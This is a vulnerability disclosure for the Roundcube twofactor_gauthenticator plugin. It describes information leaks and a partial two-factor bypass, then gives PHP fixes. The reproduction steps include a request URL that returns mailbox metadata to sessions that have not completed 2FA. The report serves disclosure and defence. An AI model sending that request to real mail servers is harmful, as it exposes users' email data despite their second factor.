Security Vulnerability Report: Information Leakage in Roundcube twofactor_gauthenticator Plugin

Summary

Three related security vulnerabilities were identified in the Roundcube twofactor_gauthenticator plugin that allowed unauthorized access to sensitive information and potential modification of 2FA settings. These vulnerabilities have been successfully addressed with comprehensive fixes.

Vulnerability Details

1. Information Leakage Vulnerability - Unauthenticated Users

Severity: Medium Component: Roundcube twofactor_gauthenticator plugin File: twofactor_gauthenticator.php Reported: Yes. Package maintainer was very accomodating and applied our patches.

Description: The plugin was leaking configuration information and localization strings to completely unauthenticated users through AJAX requests. When an unauthenticated user made an AJAX request to the Roundcube server, the plugin would still load and set environment variables, which would then be included in the JSON response.

Information Leaked:

• 2FA configuration settings (e.g., allow_save_device, days_to_remember_device)
• Localization strings related to 2FA functionality
• The fact that 2FA was enabled on the system and using Google Authenticator standalone code

How to Reproduce:

1. Ensure you are completely logged out of Roundcube (no active sessions)
2. Access a URL with the following format:

   ?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=1&_remote=1

3. Observe the JSON response containing sensitive 2FA configuration information

2. Information Leakage Vulnerability - Partially Authenticated Users

Severity: Critical Component: Roundcube twofactor_gauthenticator plugin File: twofactor_gauthenticator.php

Description: A more serious vulnerability was discovered where users who had entered valid username/password credentials but had not completed 2FA verification could access mailbox data through AJAX requests. This represents a critical security bypass of the 2FA protection mechanism.

Information Leaked:

• Mailbox information (e.g., INBOX with message count)
• Email message data including:
  • Subject lines
  • Sender information (email addresses)
  • Timestamps
  • Email sizes
  • Message IDs
  • Content types

How to Reproduce:

1. Enter valid username/password credentials to reach the 2FA verification screen
2. Without entering the 2FA code, access the following URL:

   ?_task=mail&_action=list&_refresh=1&_layout=widescreen&_mbox=INBOX&_page=1&_remote=1

3. Observe the JSON response containing actual mailbox data and email information

3. Potential Settings Modification Vulnerability

Severity: High Component: Roundcube twofactor_gauthenticator plugin File: twofactor_gauthenticator.php, function: twofactor_gauthenticator_save()

Description: The plugin's save functionality had insufficient authentication checks, potentially allowing unauthenticated users to modify 2FA settings. The existing security check only verified a specific session variable and only if 2FA was already active.

Fixes Implemented

1. Fix for Unauthenticated Information Leakage

The init() function was modified to directly block and send an error response for AJAX requests from completely unauthenticated users:

function init()
{
    $rcmail = rcube::get_instance();

    // Completely block AJAX requests for unauthenticated users
    if (!$rcmail->user->ID && !isset($_SESSION['twofactor_gauthenticator_login']) && 
        isset($_REQUEST['_remote'])) {

        // Direct JSON response to prevent leakage
        header('Content-Type: application/json');
        echo json_encode(array(
            'error' => 'Session expired or invalid',
            'redirect' => '?_task=login&_err=session'
        ));
        exit;
    }

    // Rest of the function...
}

2. Fix for Partially Authenticated Information Leakage

An additional check was added to the init() function to block data access through AJAX requests for users who have entered username/password but not completed 2FA verification, but only if they have 2FA enabled:

// Block data access via AJAX for partially authenticated users who have 2FA enabled
if (isset($_SESSION['twofactor_gauthenticator_login']) && 
    (!isset($_SESSION['twofactor_gauthenticator_2FA_login']) || 
     $_SESSION['twofactor_gauthenticator_2FA_login'] < $_SESSION['twofactor_gauthenticator_login']) && 
    isset($_REQUEST['_remote']) &&
    $rcmail->action !== 'plugin.twofactor_gauthenticator-checkcode' &&
    $rcmail->task !== 'login') {

    // Get user's 2FA config
    $user_prefs = $rcmail->user->get_prefs();
    $tfa_config = isset($user_prefs['twofactor_gauthenticator']) ? $user_prefs['twofactor_gauthenticator'] : null;

    // Only block if 2FA is enabled for this user
    if ($tfa_config && isset($tfa_config['activate']) && $tfa_config['activate']) {
        // Direct JSON response to prevent leakage
        header('Content-Type: application/json');
        echo json_encode(array(
            'error' => '2FA authentication required',
            'redirect' => '?_task=login&_err=session'
        ));
        exit;
    }
}

This ensures that only legitimate 2FA verification requests are allowed during the partial authentication state for users with 2FA enabled, while allowing normal login flow for users without 2FA enabled.

3. Fix for Settings Modification Vulnerability

The twofactor_gauthenticator_save() function was enhanced with a stronger authentication check:

function twofactor_gauthenticator_save()
{
    $rcmail = rcmail::get_instance();

    // Verify user is authenticated before allowing changes
    if (!$rcmail->user->ID) {
        header('Location: ?_task=login');
        exit;
    }

    // Rest of the function...
}

This change ensures that only authenticated users can save 2FA settings, preventing potential security bypasses.

Verification

The fixes were thoroughly tested and confirmed to:

• Prevent information leakage in unauthenticated AJAX responses
• Prevent information leakage in partially authenticated AJAX responses for users with 2FA enabled
• Allow normal login flow for users without 2FA enabled
• Allow proper 2FA verification to work normally for users with 2FA enabled
• Prevent unauthenticated users from modifying 2FA settings

Security Impact

The vulnerabilities could have allowed attackers to:

1. Gather information about the authentication system, potentially aiding in targeted attacks
2. Access email message data and mailbox information despite 2FA being enabled (partial 2FA bypass)
3. Possibly disable or modify 2FA settings, completely bypassing this critical security feature

The implemented fixes mitigate these risks by ensuring proper authentication checks are in place before exposing sensitive information or allowing configuration changes, while maintaining full functionality for both users with and without 2FA enabled.

Contact

security@codamail.com